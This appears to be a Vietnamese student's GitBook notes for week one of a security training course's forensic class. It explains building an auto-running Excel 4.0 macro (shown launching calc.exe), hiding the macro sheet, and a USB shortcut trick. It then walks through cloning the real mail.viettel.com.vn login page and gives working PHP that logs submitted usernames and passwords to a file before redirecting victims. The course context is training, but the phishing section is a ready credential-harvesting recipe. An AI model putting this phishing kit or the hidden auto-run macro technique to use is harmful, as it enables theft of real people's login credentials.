VCS Passport Blue Team
  • VCS Passport 2024 : Blue Team
  • Server-Side Vulnerabilities
    • SQL Injection Writeup
    • Authentication Writeup
    • Access Control Writeup
    • Command Injection Writeup
    • Path Traversal Writeup
    • File Upload Vulnerabilities Writeup
    • Information Disclosure Writeup
  • Client-Side Vulnerabilities
    • Cross-site Scripting Writeup
  • Advanced Web Vulnerabilities
    • Insecure Deserialization Writeup
  • Code Punching
    • Bá
    • Đạt
    • Hải
    • Khiêm
    • Quân
    • Nam
  • Programing
    • Keylogger
    • Reverse Shell
    • Process Injection
    • Basic Process, Thread, HANDLE
    • Hook
  • LINUX PROGRAMING
    • Linux Internal
    • Keylogger & Ransomware
    • Hook & Inject
  • MALWARE ANALYSIS
    • Unpack
    • Finding Threat (Lab 21 - 24)
    • Malware Analysis
    • Finding Threat (Lab 01 - 20)
  • OJT
    • Cobalt Strike Lab
    • Shell
    • TTGS CTF
    • VCS Blue CTF Season 2
    • Process and Thread
    • Service
    • COM Hijack
    • OSCP
    • Active Directory
    • Log
    • Log Windows
    • Browser-C2
    • DllSideload
    • Purple Lab
  • Forensic Class HaiNH45
    • Week 1
    • Week 2
    • Week 3
Powered by GitBook
On this page
  • Mã độc nhúng trong Excel
  • Cách tạo macro 4.0:
  • Hide macro
  • Detect
  • Usb lnk
  • Viettel Mail Phishing
  1. Forensic Class HaiNH45

Week 1

PreviousPurple LabNextWeek 2

Last updated 3 months ago

Mã độc nhúng trong Excel

Macro Excel 4.0 (XLM) được giới thiệu lần đầu vào năm 1992, là tiền thân của Visual Basic for Applications (VBA) phổ biến hiện nay, một tính năng kế thừa tích hợp trong Microsoft Excel vì lý do tương thích ngược. Macro Excel 4.0 cho phép người dùng thêm lệnh vào các ô khác nhau để thực thi mã theo thứ tự từ trên xuống, từ trái sang phải và có thể nằm trong các sheet có thuộc tính ẩn.

Cách tạo macro 4.0:

Tạo file excel và insert một sheet mới

Chọn MS Excel 4.0 Macro

Viết macro cần được thực thi, ở đây mình sẽ cho nó bật calc.exe:

Ở trên thì:

  • =EXEC("C:\windows\system32\calc.exe"): hàm XLM được sử dụng để thực thi một chương trình bên ngoài từ trong Excel, ở đây là calc.

  • =HALT(): hàm XLM dùng để ngừng hoặc dừng ngay lập tức macro đang chạy.

Sửa ô A1 thành Auto_open để tự động chạy khi mở file

Lưu file dưới dạng xlsm hoặc xls. Và giờ khi mở file, ấn vào "Enable Content" và macro sẽ được khởi chạy

Hide macro

Cách 1: Sử dụng sheet hide

Đơn giản là dùng chức năng hide có sẵn của excel

Tuy nhiên, cách này dễ dàng bị phát hiện bằng cách chọn unhide:

Cách 2: Super Hidden

Các trang có thuộc tính visible trong cấu trúc file thường bắt đầu bằng "85 00 ?? ?? ?? ?? ?? ?? 00 01", hidden và very hidden thường sẽ bắt đầu bằng chuỗi các byte "85 00 ?? ?? ?? ?? ?? ?? 01 01" và "85 00 ?? ?? ?? ?? ?? ?? 02 01". Vì vậy có thể sửa đổi thuộc tính của trang tính chứa macro thành "very hidden" để người dùng không thể unhide trong giao diện, bằng cách sửa byte thứ 9 từ 00 >>> 02.

Lý thuyết là thế nhưng em không tìm ra bytes đó :<

Detect

Usb lnk

Shortcut + hidden exe

Viettel Mail Phishing

Đầu tiên, vào mail.viettel.com.vn và Ctrl+U để copy mã nguồn

Thêm https://mail.viettel.com.vn vào trước các link file và ta sẽ có một giao diện như sau:

Giờ, ta sẽ tìm đoạn mã form đăng nhập, sau đó trỏ nó tới một file php của chúng ta. Ở đây mình dùng là login.php.

File login.php này sẽ chứa code php phục vụ mục đích phishing, ở đây để đơn giản mình sẽ viết 1 đoạn code đơn log lại username và password của người dùng, đồng thời chuyển hướng về mail viettel thật (chưa có chức năng tự động login vào mail thật)

<?php
header ('Location: https://mail.viettel.com.vn/');
$handle = fopen("logs.txt", "a");
foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "===============\r\n");
fclose($handle);
exit;
?>

Và giờ khi victim nhập thông tin và ấn đăng nhập, họ sẽ bị chuyển hướng về trang đăng nhập thật, đồng thời attacker đã có được username và password: